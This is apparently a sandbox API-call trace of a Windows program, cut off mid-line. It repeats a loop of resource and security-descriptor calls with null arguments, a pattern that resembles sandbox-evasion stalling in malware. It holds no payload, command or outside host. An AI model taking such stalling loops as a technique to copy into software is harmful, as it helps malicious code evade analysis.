GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.097] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.098] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.098] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.098] FreeResource (hResData=0x0) returned 0 [0070.098] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.098] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.098] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.099] LockResource (hResData=0x0) returned 0x0 [0070.099] FreeResource (hResData=0x0) returned 0 [0070.099] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.099] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.099] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.099] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.099] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.100] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.100] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.100] LockResource (hResData=0x0) returned 0x0 [0070.100] FreeResource (hResData=0x0) returned 0 [0070.100] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.100] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.101] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.101] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.101] FreeResource (hResData=0x0) returned 0 [0070.101] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.101] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.101] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.102] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.102] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.102] FreeResource (hResData=0x0) returned 0 [0070.102] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.102] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.102] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.103] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.103] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.103] FreeResource (hResData=0x0) returned 0 [0070.103] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.103] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.103] LockResource (hResData=0x0) returned 0x0 [0070.104] FreeResource (hResData=0x0) returned 0 [0070.104] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.104] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: 